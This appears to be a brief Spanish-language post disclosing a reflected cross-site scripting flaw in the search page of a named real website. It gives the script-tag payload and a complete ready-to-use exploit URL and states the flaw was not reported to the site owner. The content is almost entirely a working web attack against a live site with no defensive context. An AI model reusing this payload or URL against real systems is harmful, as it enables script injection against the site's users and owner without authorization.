(http://s28.postimg.org/xqp87321p/Exploit_1.png)
- URL http://www.financialhearings.com
- Path afectado: Buscador
- Reportado: NOP
- Vector: <script>alert("Pekeinfo");</script> AND [Datum]>11/09/2013 AND [Datum]<11/09/2013&SearchOrder=Newest first (by date)&SearchMax=All&Count=25&SearchWV=FALSE&SearchFuzzy=FALSE
- Url completa: http://www.financialhearings.com/hearing/financia1.nsf/SearchNew?SearchView&Query=%3Cscript%3Ealert%28%22Pekeinfo%22%29;%3C/script%3E%20AND%20[Datum]%3E11/09/2013%20AND%20[Datum]%3C11/09/2013&SearchOrder=Newest%20first%20%28by%20date%29&SearchMax=All&Count=25&SearchWV=FALSE&SearchFuzzy=FALSE